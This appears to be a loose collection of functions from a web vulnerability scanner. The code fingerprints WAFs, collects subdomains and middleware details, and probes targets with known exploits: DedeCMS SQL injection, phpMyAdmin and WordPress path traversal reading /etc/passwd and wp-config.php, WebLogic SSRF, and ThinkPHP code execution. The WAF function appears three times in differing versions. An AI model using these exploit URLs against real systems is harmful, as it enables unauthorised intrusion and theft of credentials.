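def check_waf(target, logger_type, proxy = None):
    """Fingerprint the WAF in front of ``target`` and report the best match.

    Each probe string in the module-level ``waf_checker`` is injected into the
    URL's query parameters by ``chambering`` and sent with ``requester``.  Only
    responses with a 4xx/5xx status are scored against the signatures loaded
    from ``data/waf_signature``: one point each for a body match, a status-code
    match and a header match.  The highest-scoring signature is logged through
    the ``Waf`` logger; a score of zero prints the "No firewall detected" line.

    Args:
        target: URL (with query parameters) to probe.
        logger_type: logger flavour handed to ``factory_logger``.
        proxy: optional proxy forwarded unchanged to ``requester``.

    Returns:
        None; the result is reported via the logger / stdout only.
    """
    # folder = Path.cwd().parent
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"  # resolved against the working directory
    logger = factory_logger(logger_type, target, "Waf")
    with open(waf_file, 'r') as loader:
        waf_data = json.load(loader)

    # chambering() hands back a rebuilt (url, params) pair; always derive it from
    # the caller's URL so one probe's rewrite does not feed into the next probe.
    original_target = target
    best_score = 0
    best_info = {'company': None, 'waf_type': None, 'bypass_known': None}

    for intruder in waf_checker:
        try:
            target, payload = chambering(original_target, strike=True, payload=intruder)
            response = requester(target, payload, GET=True, timeout=5, proxy=proxy)
            if response is None:
                continue
            page, code, headers = response.text, response.status_code, response.headers
            if code < 400:
                # Accepted requests carry no block page worth scoring.
                continue
            # re.search() needs str operands: status_code is an int and headers is
            # a mapping, both of which re.search rejects with TypeError.  Headers
            # are flattened to "Name: value" lines -- assumed to be what the
            # signature regexes expect, TODO confirm against data/waf_signature.
            code_text = str(code)
            header_text = "\n".join(f"{name}: {value}" for name, value in headers.items())
            for waf_name, waf_signature in waf_data.items():
                score = 0
                if re.search(waf_signature['regex'], page, re.I):
                    score += 1
                if "code" in waf_signature and re.search(waf_signature['code'], code_text, re.I):
                    score += 1
                if "header" in waf_signature and re.search(waf_signature["header"], header_text, re.I):
                    score += 1
                if score > best_score:
                    # Plain assignment here: ``waf_match[match] : waf_info`` was an
                    # annotation statement and never stored anything.
                    best_score = score
                    best_info = {
                        'company': waf_name,
                        'waf_type': waf_signature['name'],
                        # a signature without the key simply has no documented bypass
                        'bypass_known': waf_signature.get('bypass_known'),
                    }
        except Exception as exc:
            # Best effort: one failed probe (timeout, malformed signature entry, ...)
            # must not abort the remaining probes, but it should not vanish either.
            logger.info(f"probe {intruder!r} failed: {exc}")

    if best_score > 0:
        # Report the matched signature rather than the bare score.
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")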
def __init__(self,target,file,logger_type):
    """Set up the subdomain-collector state for ``target``.

    ``file`` is stored for later use and ``time`` is the module-level value
    captured at construction.  ``self.domain`` keeps the last two labels of
    ``target`` (the string is split on every dot but the last); a target
    with fewer than two labels is kept as is.
    """
    self.file = file
    self.time = time
    self.subdomains = set()
    self.file_loader = asyncio.Queue()
    # The resolver is bound to the same loop, so fetch it once up front.
    # NOTE(review): get_event_loop() outside a running loop is deprecated on
    # newer interpreters -- confirm the caller's loop setup.
    event_loop = asyncio.get_event_loop()
    self.loop = event_loop
    dot_count = target.count(".")
    self.domain = target.split(".", dot_count - 1)[-1]
    self.resolver = aiodns.DNSResolver(timeout=3, loop=event_loop)
    self.logger = factory_logger(logger_type, target, 'subdomain')
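def detect_info(target, logger_type):
    """Collect middleware fingerprints for ``target`` through an external API.

    The page is fetched with ``requester``; its URL, body and headers are
    serialised to JSON, zlib-compressed and uploaded to
    ``http://whatweb.bugscaner.com/api.go``.  The categories listed in ``keys``
    are copied from the API reply into ``info``.

    NOTE: the complete response body of the target leaves the scanning host
    and travels to a third party over plain HTTP; factor that into the
    handling of any engagement where the target content is sensitive.

    Args:
        target: URL to fingerprint.
        logger_type: logger flavour handed to ``factory_logger``.

    Returns:
        The populated ``info`` dict on success.  When the request fails,
        ``requester`` yields ``None``, or the API reports ``error``, a dict
        holding only ``'message'`` is logged and ``None`` is returned (the
        original contract for the error path).
    """
    logger_middle = factory_logger(logger_type, target, "middleware")
    print(f"{red}[!][{time}] Collecting middleware information....{end}")
    info = {
        'Waf': None,
        'CDN': None,
        'CMS': None,
        'Web Servers': None,
        'Web Frameworks': None,
        'Operating Systems': None,
        'JavaScript Frameworks': None,
        'Programming Languages': None,
    }
    # NOTE(review): 'CMS' is initialised above but absent here, so it is never
    # filled from the reply -- confirm whether the API uses that key.
    keys = [
        'Waf',
        'CDN',
        'Web Servers',
        'Web Frameworks',
        'Operating Systems',
        'JavaScript Frameworks',
        'Programming Languages',
    ]
    url, data = chambering(target, strike=False)
    api_reply = None
    try:
        response = requester(url, data, GET=True)
        # Other callers in this file treat a None response as a failed request;
        # previously that surfaced as a swallowed AttributeError and the
        # chambering() params were mistaken for an API reply.
        if response is not None:
            snapshot = json.dumps({
                "url": response.url,
                "text": response.text,
                "headers": dict(response.headers),
            }).encode()
            result = requests.post(
                "http://whatweb.bugscaner.com/api.go",
                files={"info": zlib.compress(snapshot)},
            )
            api_reply = dict(result.json())
    except Exception as exc:
        # Best effort: any failure falls through to the error report below.
        logger_middle.info(f"middleware lookup failed: {exc}")

    if api_reply is not None and 'error' not in api_reply:
        for key in keys:
            if key in api_reply:
                info[key] = api_reply[key]
        logger_middle.info(info)
        return info

    info.clear()
    info['message'] = "Error Message!"
    logger_middle.info(info)
    return None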
def tomcat_cve_2018_11759(self):
    """Check the Tomcat ``jkstatus`` endpoint (CVE-2018-11759) and log a hit.

    A 200 reply whose body contains ``ServerRoot=*`` is logged as critical.
    Any exception (timeout, connection error, ...) is reported as "not found"
    through a secondary logger stored on ``self.logger_``, so a network
    failure is indistinguishable from a negative result in the log.
    """
    url = f"{self.url}/jkstatus;?cmd=dump"
    try:
        reply = requests.get(url, timeout=5)
        matched = reply.status_code == 200 and "ServerRoot=*" in reply.text
        if matched:
            self.logger.critical(f"url : {url}\nTomcat_cve_2018_11759 exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Tomcat_cve_2018_11759 not found !")
def dedecms_membergroup_sqli(self):
    """Check the DedeCMS ``ajax_membergroup.php`` injection signature.

    A 200 reply echoing the marker ``123456789`` is logged as critical.
    Any exception is reported as "not found" via a secondary logger kept on
    ``self.logger_``; transport errors therefore look like negatives.
    """
    probe_path = "/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+123456789+--+@`'`"
    url = self.url + probe_path
    try:
        reply = requests.get(url, timeout=5)
        matched = reply.status_code == 200 and "123456789" in reply.text
        if matched:
            self.logger.critical(f"url : {url}\nDedecms_membergroup_sqli exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Dedecms_membergroup_sqli not found !")
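def weblogic_ssrf(self):
    """Check the WebLogic UDDI explorer SSRF signature and log a hit.

    Match condition: HTTP 200 *and* either ``'127.1.1.1'`` or ``Socket Closed``
    in the body.  The previous ``a and b or c`` expression bound the status
    check only to the first marker, so any page containing "Socket Closed"
    (e.g. a generic error page on a 500) was reported as a finding.

    Any exception is reported as "not found" through a secondary logger kept
    on ``self.logger_``; transport errors therefore look like negatives.
    """
    url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
    try:
        response = requests.get(url, timeout=5)
        body = response.text
        marker_seen = "'127.1.1.1'" in body or "Socket Closed" in body
        if response.status_code == 200 and marker_seen:
            self.logger.critical(f"url : {url}\nWeblogic_ssrf exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Weblogic ssrf not found !")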
def __init__(self,target,logger_type,subdomain_queue = None,file = None):
    """Initialise per-target scan state: dedup set, work queues and logger."""
    self.target = target
    self.file = file
    self.logger_type = logger_type
    self.subdomains_queue = subdomain_queue
    self.requests_seen = set()
    self.filter_ = Filter.filter
    # Three FIFO work queues; the names suggest crawl URLs, test candidates and
    # discovered domains -- confirm against the consumers before relying on that.
    self.target_url = queue.Queue()
    self.Attack_target = queue.Queue()
    self.target_domain = queue.Queue()
    self.domain = extract_domain(target)
    self.logger = factory_logger(logger_type, target, "vulnerable")
def dedecms_file_inclusion(self):
    """Check the DedeCMS ``carbuyaction.php`` inclusion signature.

    Only the status code is inspected: any 200 reply is logged as critical,
    so a catch-all 200 error page produces a false positive -- treat the hit
    as a lead to verify, not a confirmed result.  Any exception is reported
    as "not found" via a secondary logger kept on ``self.logger_``.
    """
    url = self.url + r'/plus/carbuyaction.php?dopost=return&code=../../'
    try:
        reply = requests.get(url, timeout=5)
        if reply.status_code == 200:
            self.logger.critical(f"url : {url}\nDedecms_file_inclusion exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Dedecms_file_inclusion not found !")
def phpmyadmin_CVE_2018_12613(self):
    """Check the phpMyAdmin CVE-2018-12613 inclusion signature and log a hit.

    A 200 reply whose body *starts* with a ``root:x:0:0:`` style passwd line
    (``re.match`` anchors at offset 0, so a body with any preamble does not
    match) is logged as critical.  Any exception is reported as "not found"
    via a secondary logger kept on ``self.logger_``.
    """
    url = self.url + r'/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
    passwd_line = re.compile(r'root:[x*]:0:0:', re.I)
    try:
        reply = requests.get(url, timeout=5)
        matched = reply.status_code == 200 and passwd_line.match(reply.text)
        if matched:
            self.logger.critical(f"url : {url}\nPhpmyadmin_CVE_2018_12613 exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Phpmyadmin_CVE_2018_12613 not found !")
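def wordpress_lfi(self):
    """Check the WordPress adaptive-images inclusion signature and log a hit.

    A 200 reply containing all of ``DB_NAME``, ``DB_USER`` and ``DB_PASSWORD``
    is logged as critical.  The handler now catches ``Exception`` instead of
    a bare ``except:``, which also swallowed ``KeyboardInterrupt`` and
    ``SystemExit`` and made the scan impossible to interrupt cleanly.  Any
    exception is reported as "not found" through a secondary logger kept on
    ``self.logger_``, so transport errors look like negatives.
    """
    url = self.url + "/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
    markers = ("DB_NAME", "DB_USER", "DB_PASSWORD")
    try:
        response = requests.get(url, timeout=5)
        body = response.text
        if response.status_code == 200 and all(marker in body for marker in markers):
            self.logger.critical(f"url : {url}\nWordpress Local file include exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Wordpress Local file include not found !")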
def thinkphp_RCE_CVE_2018_5955(self):
    """Check the ThinkPHP ``invokefunction`` signature (labelled CVE-2018-5955).

    The probe goes through ``requester`` rather than ``requests.get``; a 500
    reply containing both ``PHP`` and ``System`` is logged as critical.  Any
    exception is reported as "not found" via a secondary logger kept on
    ``self.logger_``.  The leading empty ``print`` only emits a blank line.
    """
    print("")
    url = (self.url
           + r'/index.php?s=/Index/\think\app/invokefunction&function='
           + r'call_user_func_array&vars[0]=phpinfo&vars[1][]=-1')
    try:
        reply = requester(url, data=None, GET=True, timeout=5)
        body = reply.text
        matched = reply.status_code == 500 and 'PHP' in body and 'System' in body
        if matched:
            self.logger.critical(f"url : {url}\nThinkphp_RCE_CVE_2018_5955 exists !\n")
    except Exception:
        self.logger_ = factory_logger(self.logger_type, self.target, "poc not found")
        self.logger_.info("Thinkphp_RCE_CVE_2018_5955 not found !")
def __init__(self,target,logger_type):
    """Initialise the proxy-source scraper: seen set, queue, logger, parsers."""
    self.filter_proxy = set()
    self.container = queue.Queue()
    self.logger = factory_logger(logger_type, target, "proxy_generator")
    # Source name -> parser from the project ``regex`` module; insertion
    # order is preserved in the resulting dict.
    sources = (
        ('data5u', regex.data5u),
        ('xicidaili', regex.xicidaili),
        ('iphai', regex.iphai),
        ('xiladaili', regex.xiladaili),
        ('ip3366', regex.ip3366),
        ('ip_jiangxianli', regex.jiangxianli),
        ('ip_huan', regex.ip_huan),
    )
    self.dic = dict(sources)
    # Subset of sources enabled by default.
    self.list_name = ['data5u', 'xicidaili', 'iphai']
def __init__(self, url, logger_type, middleware_info=None, middleware_type=None):
    """Bind the check methods to ``url`` and build the middleware dispatch table.

    ``url`` is stored both as ``self.url`` (request base) and ``self.target``
    (logger label).  ``middleware_info`` is kept on ``self._dic`` untouched.
    """
    self.url = url
    self.target = url
    self._dic = middleware_info
    self.logger_type = logger_type
    self.logger = factory_logger(logger_type, url, "poc")
    self.middleware_type = middleware_type
    # middleware name -> bound check; dedecms carries two checks in a tuple,
    # so consumers must handle both a callable and a tuple of callables.
    dedecms_checks = (self.dedecms_file_inclusion, self.dedecms_membergroup_sqli)
    self.midd_dic = {
        "thinkphp": self.thinkphp_RCE_CVE_2018_5955,
        "phpmyadmin": self.phpmyadmin_CVE_2018_12613,
        "dedecms": dedecms_checks,
        "tomcat": self.tomcat_cve_2018_11759,
        "weblogic": self.weblogic_ssrf,
        "wordpress": self.wordpress_lfi,
    }
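def check_waf(target, logger_type, proxy = None):
    """Fingerprint the WAF in front of ``target`` and report the best match.

    Requires a URL with at least one query parameter: each probe string from
    the module-level ``waf_checker`` is injected into the parameters by
    ``chambering`` (probes starting with ``<`` are passed as type ``XSS``,
    all others as ``SQLi``) and dispatched with ``requester``.  Responses with
    a 4xx/5xx status are scored against the signatures loaded from
    ``data/waf_signature``: one point each for a body, status-code and header
    match.  The highest-scoring signature is logged through the ``Waf``
    logger; a zero score prints the "No firewall detected" line instead.

    Args:
        target: URL (with query parameters) to probe.
        logger_type: logger flavour handed to ``factory_logger``.
        proxy: optional proxy forwarded unchanged to ``requester``.

    Returns:
        None; results are reported via the logger / stdout only.

    Raises:
        SystemExit: when ``target`` carries no ``=``, i.e. nothing to inject into.
    """
    original_target = target
    if "=" not in original_target:  # the probes need a parameter to ride on
        print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
        raise SystemExit  # same effect as quit() without depending on the site module

    # folder = Path.cwd().parent  # debugging aid
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"  # resolved against the working directory
    logger = factory_logger(logger_type, target, "Waf")
    with open(waf_file, 'r') as loader:  # load the WAF signature database
        waf_data = json.load(loader)

    best_score = 0
    best_info = {'company': None, 'waf_type': None, 'bypass_known': None}

    for intruder in waf_checker:  # send each fuzz payload and watch the reaction
        try:
            intruder_type = "XSS" if intruder.startswith("<") else "SQLi"
            # chambering() returns a rebuilt (url, params) pair, e.g.
            # ('www.baidu.com', {'a': '1', 'bb': '22'}) per the author's note;
            # always start from the caller's URL so rewrites do not accumulate.
            target, payload = chambering(original_target, strike=True, payload=intruder, type=intruder_type)
            response = requester(target, payload, GET=True, timeout=5, proxy=proxy)
            print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")
            if response is None:
                continue
            page, code, headers = response.text, response.status_code, response.headers
            if code < 400:
                # Accepted requests carry no block page worth scoring.
                continue
            # re.search() needs str operands: status_code is an int and headers is
            # a mapping, both of which re.search rejects with TypeError.  Headers
            # are flattened to "Name: value" lines -- assumed to be what the
            # signature regexes expect, TODO confirm against data/waf_signature.
            code_text = str(code)
            header_text = "\n".join(f"{name}: {value}" for name, value in headers.items())
            for waf_name, waf_signature in waf_data.items():  # case-insensitive matching
                score = 0
                if re.search(waf_signature['regex'], page, re.I):
                    score += 1
                if "code" in waf_signature and re.search(waf_signature['code'], code_text, re.I):
                    score += 1
                if "header" in waf_signature and re.search(waf_signature["header"], header_text, re.I):
                    score += 1
                if score > best_score:  # keep the best-scoring signature
                    # Plain assignment here: ``waf_match[match] : waf_info`` was an
                    # annotation statement and never stored anything.
                    best_score = score
                    best_info = {
                        'company': waf_name,
                        'waf_type': waf_signature['name'],
                        # a signature without the key has no documented bypass
                        'bypass_known': waf_signature.get('bypass_known'),
                    }
        except Exception as exc:
            # Best effort: one failed probe (timeout, malformed signature entry, ...)
            # must not abort the remaining probes, but it should not vanish either.
            logger.info(f"probe {intruder!r} failed: {exc}")

    if best_score > 0:  # report the matched WAF rather than the bare score
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")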
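def check_waf(target, logger_type, proxy = None):
    """Fingerprint the WAF in front of ``target`` and report the best match.

    Requires a URL with at least one query parameter: each probe string from
    the module-level ``waf_checker`` is injected into the parameters by
    ``chambering`` (probes starting with ``<`` are passed as type ``XSS``,
    all others as ``SQLi``) and dispatched with ``requester``.  Responses with
    a 4xx/5xx status are scored against the signatures loaded from
    ``data/waf_signature``: one point each for a body, status-code and header
    match.  The highest-scoring signature is logged through the ``Waf``
    logger; a zero score prints the "No firewall detected" line instead.

    Args:
        target: URL (with query parameters) to probe.
        logger_type: logger flavour handed to ``factory_logger``.
        proxy: optional proxy forwarded unchanged to ``requester``.

    Returns:
        None; results are reported via the logger / stdout only.

    Raises:
        SystemExit: when ``target`` carries no ``=``, i.e. nothing to inject into.
    """
    original_target = target
    if "=" not in original_target:
        print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
        raise SystemExit  # same effect as quit() without depending on the site module

    # folder = Path.cwd().parent
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"  # resolved against the working directory
    logger = factory_logger(logger_type, target, "Waf")
    with open(waf_file, 'r') as loader:
        waf_data = json.load(loader)

    best_score = 0
    best_info = {'company': None, 'waf_type': None, 'bypass_known': None}

    for intruder in waf_checker:
        try:
            intruder_type = "XSS" if intruder.startswith("<") else "SQLi"
            target, payload = chambering(original_target, strike=True, payload=intruder, type=intruder_type)
            response = requester(target, payload, GET=True, timeout=5, proxy=proxy)
            print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")
            # The response must be unpacked before the status is tested; the
            # earlier ``if code >= 400 and not response is None`` read ``code``
            # before it was bound and every probe died in the except clause.
            if response is None:
                continue
            page, code, headers = response.text, response.status_code, response.headers
            if code < 400:
                # Accepted requests carry no block page worth scoring.
                continue
            # re.search() needs str operands: status_code is an int and headers is
            # a mapping, both of which re.search rejects with TypeError.  Headers
            # are flattened to "Name: value" lines -- assumed to be what the
            # signature regexes expect, TODO confirm against data/waf_signature.
            code_text = str(code)
            header_text = "\n".join(f"{name}: {value}" for name, value in headers.items())
            for waf_name, waf_signature in waf_data.items():
                score = 0
                if re.search(waf_signature['regex'], page, re.I):
                    score += 1
                if "code" in waf_signature and re.search(waf_signature['code'], code_text, re.I):
                    score += 1
                if "header" in waf_signature and re.search(waf_signature["header"], header_text, re.I):
                    score += 1
                if score > best_score:
                    # Plain assignment here: ``waf_match[match] : waf_info`` was an
                    # annotation statement and never stored anything.
                    best_score = score
                    best_info = {
                        'company': waf_name,
                        'waf_type': waf_signature['name'],
                        # a signature without the key has no documented bypass
                        'bypass_known': waf_signature.get('bypass_known'),
                    }
        except Exception as exc:
            # Best effort: one failed probe (timeout, malformed signature entry, ...)
            # must not abort the remaining probes, but it should not vanish either.
            logger.info(f"probe {intruder!r} failed: {exc}")

    if best_score > 0:
        # Report the matched signature rather than the bare score.
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")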